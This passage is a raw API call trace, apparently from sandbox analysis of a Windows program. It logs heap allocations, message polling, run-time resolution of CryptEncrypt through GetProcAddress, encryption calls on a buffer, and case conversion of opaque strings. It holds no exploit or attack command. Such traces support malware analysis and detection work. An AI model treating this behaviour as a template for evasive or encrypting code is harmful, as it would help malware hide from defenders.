HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0261.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa140, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.562] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0261.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.562] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x192, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x198) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.565] CharLowerBuffW (in: lpsz="byte[408]", cchLength=0x9 | out: lpsz="byte[408]") returned 0x9 [0261.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.565] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.565] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.571] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.572] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2416270*, pdwDataLen=0x8bef68*=0x192, dwBufLen=0x198 | out: pbData=0x2416270*, pdwDataLen=0x8bef68*=0x198) returned 1 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0261.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0261.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.573] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.573] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.574] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.574] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.574] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.574] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.574] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.574] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.574] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.575] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.575] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, 